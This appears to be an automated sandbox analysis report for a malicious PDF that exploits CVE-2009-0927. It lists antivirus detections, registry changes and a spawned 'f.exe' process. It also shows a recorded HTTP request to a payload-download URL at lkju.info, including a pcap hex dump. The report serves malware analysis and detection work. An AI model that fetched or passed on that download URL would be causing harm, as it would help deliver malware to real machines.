Analysis Date2015-08-10 23:04:29
MD59fd523d28ce3dda94f65a9e06b3de3d9
SHA15effed6acc992bae52a07e3b9c09bb5df0d1c54f

Static Details:

File typePDF document, version 1.4
AVGrisoft (avg)Script/PDF.Exploit.V
AVMicrosoft Security Essentialsno_virus
AVK7no_virus
AVTwisterno_virus
AVMcafeeExploit-PDF.q.gen!stream
AVArcabit (arcavir)Trojan.Script.474359_Exploit.CVE-2009-0927.Gen_Exploit.XMLCoreSrv.A
AVF-SecureTrojan.Script.474359
AVAuthentiumJS/Pdfka.D.gen
AVAd-AwareTrojan.Script.474359:Exploit.CVE-2009-0927.Gen:Exploit.XMLCoreSrv.A
AVEmsisoftTrojan.Script.474359:Exploit.CVE-2009-0927.Gen:Exploit.XMLCoreSrv.A
AVVirusBlokAda (vba32)Exploit.JS.Pdfka.ako
AVZillya!no_virus
AVClamAVExploit.PDF-672
AVFortinetJS/Crypt.PDM!tr
AVCAT (quickheal)no_virus
AVDr. WebSCRIPT.Virus
AVEset (nod32)JS/Exploit.Pdfka.PPL
AVMicroWorld (escan)Trojan.Script.474359
AVMalwareBytesno_virus
AVPadvishno_virus
AVCA (E-Trust Ino)PDF/Pidief!generic
AVKasperskyExploit.JS.Pdfka.ako
AVAvira (antivir)EXP/CVE-2009-0927.A.19
AVBullGuardTrojan.Script.474359:Exploit.CVE-2009-0927.Gen:Exploit.XMLCoreSrv.A
AVRisingHack.Exploit.MalPDF.a
AVSymantecTrojan.Gen
AVIkarusno_virus
AVFrisk (f-prot)JS/Pdfka.D.gen
AVAlwil (avast)Obfuscated-EW [Trj]
AVBitDefenderTrojan.Script.474359:Exploit.CVE-2009-0927.Gen:Exploit.XMLCoreSrv.A
AVTrend Microno_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.pdf

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process..\f.exe
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates MutexGlobal\AcrobatViewerIsRunning
Creates MutexDBWinMutex
Winsock DNSlkju.info

Process
↳ ..\f.exe

Network Details:

DNSlkju.info
Type: A
203.189.109.207
HTTP GEThttp://lkju.info/zxc/getexe.php?o=2&t=1257004242&i=2154770527&h=ef0085f2&e=4
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 203.189.109.207:80

Raw Pcap
0x00000000 (00000)   47455420 2f7a7863 2f676574 6578652e   GET /zxc/getexe.
0x00000010 (00016)   7068703f 6f3d3226 743d3132 35373030   php?o=2&t=125700
0x00000020 (00032)   34323432 26693d32 31353437 37303532   4242&i=215477052
0x00000030 (00048)   3726683d 65663030 38356632 26653d34   7&h=ef0085f2&e=4
0x00000040 (00064)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000050 (00080)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000060 (00096)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000070 (00112)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000080 (00128)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000090 (00144)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x000000a0 (00160)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x000000b0 (00176)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x000000c0 (00192)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000d0 (00208)   0a486f73 743a206c 6b6a752e 696e666f   .Host: lkju.info
0x000000e0 (00224)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x000000f0 (00240)   65702d41 6c697665 0d0a0d0a            ep-Alive....


Strings